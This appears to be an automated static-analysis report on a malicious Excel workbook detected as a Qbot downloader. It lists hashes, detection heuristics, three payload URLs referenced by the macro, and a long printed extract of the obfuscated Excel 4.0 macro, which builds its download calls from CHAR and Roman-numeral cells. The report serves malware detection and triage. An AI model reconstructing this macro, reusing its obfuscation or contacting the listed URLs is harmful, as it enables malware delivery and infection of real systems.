Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 f94372b73885b644…

MALICIOUS

Office (OLE) / .XLS

109.5 KB Created: 2015-06-05 18:19:34 Authoring application: Microsoft Excel First seen: 2026-06-08
MD5: d391cbb4c5be9b2571c481f09892eebb SHA-1: 94a31f68151ec5873ee8e15bec7b671a5f750adc SHA-256: f94372b73885b644fc7c323f196af536554d86d26044c1159fa1f57a2cf0aaf7
262 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.Qbot11202120-9906200-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Qbot11202120-9906200-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://decinfo.com.br/s4hfZyv7NFEM/y9.html Referenced by macro
    • https://imprimija.com.br/BIt2Zlm3/y5.htmlReferenced by macro
    • https://stunningmax.com/JR3xNs7W7Wm1/y1.htmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 11292 bytes
SHA-256: 230bdabe975ee04968fa009647a2319aa74c7d8f3acbeb25b6d04959c2937676
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Shee
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sbur
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sbur
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sbur
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Ko
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  DEFW
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  DEFW
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  DEF
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Beff
' 0018     29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr  *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018     26 LABEL : Cell Value, String Constant - EFEF len=7 ptgRef3d  Beff!D3 
' 0018     26 LABEL : Cell Value, String Constant - ERFW len=7 ptgRef3d  Shee!G18 
' 0018     26 LABEL : Cell Value, String Constant - GRRG len=7 ptgRef3d  Shee!G14 
' 0018     26 LABEL : Cell Value, String Constant - LALW len=7 ptgRef3d  Shee!G16 
' 0018     26 LABEL : Cell Value, String Constant - RFWF len=7 ptgRef3d  Beff!C4 
' 0018     26 LABEL : Cell Value, String Constant - RTWE len=7 ptgRef3d  Beff!C4 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Shee!G1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  Sbur,D1,CHAR(210-100),""
'  Sbur,T1,CHAR(86-1),""
'  Sbur,I2,CHAR(120-53),""
'  Sbur,L2,CHAR(200-135),""
'  Sbur,N2,CHAR(182-100),""
'  Sbur,E3,CHAR(102-54),""
'  Sbur,Q3,CHAR(179-110),""
'  Sbur,G5,CHAR(215-99),""
'  Sbur,B6,CHAR(100-25),""
'  Sbur,M6,CHAR(210-101),""
'  Sbur,P6,CHAR(193-110),""
'  Sbur,K7,CHAR(222-101),""
'  Sbur,S7,CHAR(103-50),""
'  Sbur,E8,CHAR(208-100),""
'  Sbur,H8,CHAR(200-89),""
'  Sbur,Q9,CHAR(203-100),""
'  Sbur,C10,CHAR(201-100),""
'  Sbur,F11,CHAR(200-103),""
'  Sbur,J11,CHAR(104-46),""
'  Sbur,L11,CHAR(216-99),""
'  Sbur,O11,CHAR(205-101),""
'  Sbur,N13,CHAR(186-110),""
'  Sbur,A14,CHAR(215-101),""
'  Sbur,G14,CHAR(100-32),""
'  Sbur,Q14,CHAR(219-101),""
'  Sbur,D15,CHAR(205-100),""
'  Sbur,I15,CHAR(170-96),""
'  Sbur,O16,CHAR(220-100),""
'  Sbur,B17,CHAR(102-51),""
'  Sbur,E18,CHAR(201-102),""
'  Sbur,L18,CHAR(213-128),""
'  Sbur,C19,CHAR(101-51),""
'  Sbur,J20,CHAR(219-100),""
'  Sbur,N20,CHAR(176-110),""
'  Sbur,G21,CHAR(213-101),""
'  Sbur,D24,CHAR(200-85),""
'  Sbur,K24,CHAR(201-101),""
'  Sbur,H25,CHAR(164-80),""
'  Sbur,F27,CHAR(160-90),""
'  Sbur,F44,"",1.00000000000000000000
'  Sbur,D53,_xlfn.ARABIC("CXI"),""
'  Sbur,J53,_xlfn.ARABIC("LXXVI"),""
'  Sbur,G54,_xlfn.ARABIC("LXV"),""
'  Sbur,S55,_xlfn.ARABIC("LXVII"),""
'  Sbur,O57,_xlfn.ARABIC("CI"),""
'  Sbur,E59,_xlfn.ARABIC("LXI"),""
'  Sbur,T60,_xlfn.ARABIC("CXIV"),""
'  Sbur,H1,T( Sbur!K7& Sbur!L2& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!I15& Sbur!I2& Sbur!I15& Sbur!G34& Sbur!G35& Sbur!G34),""
'  Sbur,D2,T( Sbur!E3& Sbur!G35& Sbur!E3& Sbur!E67),""
'  Sbur,R2,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35&D2),""
'  Sbur,K3,T( Sbur!F11& Sbur!G5& Sbur!C10& Sbur!G14& Sbur!D15),""
'  Sbur,T4,T( Sbur!E3& Sbur!G35& Sbur!S7& Sbur!E67),""
'  Sbur,B5,T( Sbur!G34& Sbur!B6& Sbur!C10),""
'  Sbur,N6,T( Sbur!C10& Sbur!E18& Sbur!G5& Sbur!H8),""
'  Sbur,D8,T( Sbur!D1& Sbur!C10& Sbur!E8& Sbur!B17& Sbur!C19& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!I2),""
'  Sbur,P9,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G34& Sbur!G35& Sbur!E3& Sbur!E67),""
'  Sbur,J10,T( Sbur!L2& Sbur!G34& Sbur!G35& Sbur!K47& Sbur!I15& Sbur!I15),""
'  Sbur,F12,T( Sbur!G34& Sbur!L11),""
'  Sbur,D14,T( Sbur!D1& Sbur!G34& Sbur!G35& Sbur!G34),""
'  Sbur,Q15,T( Sbur!G34& Sbur!T1& Sbur!N2& Sbur!N13& Sbur!G14& Sbur!H8& Sbur!J20& Sbur!D1& Sbur!E8& Sbur!H8& Sbur!F11& Sbur!K24& Sbur!H25& Sbur!H8& Sbur!F27& Sbur!D15& Sbur!E8),""
'  Sbur,L16,T( Sbur!E8& Sbur!M6& Sbur!H8& Sbur!D1& Sbur!G34& Sbur!G35),""
'  Sbur,B17,T( Sbur!G34& Sbur!P6& Sbur!O11),""
'  Sbur,G19,T( Sbur!E3& Sbur!G35),""
'  Sbur,Q21,T( Sbur!N20& Sbur!N20& Sbur!G34& Sbur!G35),""
'  Sbur,F23,T( Sbur!E8& Sbur!E8& Sbur!B17& Sbur!C19& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!P6& Sbur!O11),""
'  Sbur,N25,T( Sbur!I15& Sbur!I15& Sbur!G34& Sbur!G35& Beff!G19& Sbur!G34& Sbur!H8& Sbur!G21),""
'  Sbur,S27,T( Sbur!E8& Sbur!E8& Sbur!Q3& Sbur!O16& Sbur!C10& Sbur!E18& Sbur!L11& Sbur!G5& Sbur!C10& Sbur!L2& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!I15& Sbur!I15),""
'  Sbur,O30,T( Sbur!C10& Sbur!Q9& Sbur!D24& Sbur!Q14),""
'  Sbur,G1,T( Beff!Q21& Beff!G19& Beff!H32),""
'  Sbur,S2,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!C19& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!D2),""
'  Sbur,N4,T( Beff!Q21& Beff!G19& Beff!J29),""
'  Sbur,C8,T( Beff!Q21& Beff!G19& Beff!F29),""
'  Sbur,S8,T( Sbur!B17& Sbur!C19& Sbur!G34& Sbur!G35& Sbur!G34),""
'  Sbur,I11,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!F44& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!G34& Sbur!G35& Beff!D2),""
'  Sbur,O17,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!F44& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!T4),""
'  Sbur,D18,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!T4),""
'  Sbur,G23,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!C19& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!T4),""
'  DEF,G10,"FORMULA.FILL()=FORMULA( Beff!D12, Beff!G2)=FORMULA( Sbur!D10, Ko!A2)=FORMULA()=FORMULA( Ko!E9, DEFW!H1)=FORMULA()=FORMULA( DEFW!C8, DEFW!I4)=FORMULA( DEFW!C10, DEF!B3)=FORMULA( DEF!D10, Sbur!J8)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B5& Sbur!J8& Beff!D8& Sbur!J8& DEF!B3& Beff!K3& Sbur!J8& Beff!N6& Sbur!J8& Beff!H1& DEFW!I4& Beff!P9,G16)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!F12& Sbur!J8& Beff!L16& Beff!Q15& DEF!B3& Beff!J10& DEFW!I4& DEFW!I4& Beff!C8& DEFW!I4& Beff!R2,G18)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!F12& Sbur!J8& Beff!L16& Beff!Q15& DEF!B3& Beff!J10& DEFW!I4& DEFW!I4& Beff!G1& DEFW!I4& Beff!I11,G20)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!F12& Sbur!J8& Beff!L16& Beff!Q15& DEF!B3& Beff!J10& DEFW!I4& DEFW!I4& Beff!N4& DEFW!I4& Beff!S2,G22)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B17& DEF!B3& Beff!F23& DEF!B3& Beff!S27& DEFW!I4& DEFW!I4& DEFW!I4& Beff!N25& DEF!B3& Beff!D14& Sbur!J8& Beff!O30& Sbur!J8& Beff!S8& DEFW!I4& Beff!D18,G24)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B17& DEF!B3& Beff!F23& DEF!B3& Beff!S27& DEFW!I4& DEFW!I4& DEFW!I4& Beff!N25& DEF!B3& Beff!D14& Sbur!J8& Beff!O30& Sbur!J8& Beff!S8& DEFW!I4& Beff!O17,G26)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B17& DEF!B3& Beff!F23& DEF!B3& Beff!S27& DEFW!I4& DEFW!I4& DEFW!I4& Beff!N25& DEF!B3& Beff!D14& Sbur!J8& Beff!O30& Sbur!J8& Beff!S8& DEFW!I4& Beff!G23,G28)",""
'  Beff,C11,CHAR( Sbur!D53),""
'  Beff,D10,CHAR( Sbur!E59),""
'  Beff,E9,CHAR( Sbur!J53),""
'  Beff,C8,CHAR( Sbur!S55),""
'  Beff,C10,CHAR( Sbur!O57),""
'  Beff,D10,CHAR( Sbur!T60),""
'  Beff,D12,CHAR( Sbur!G54),""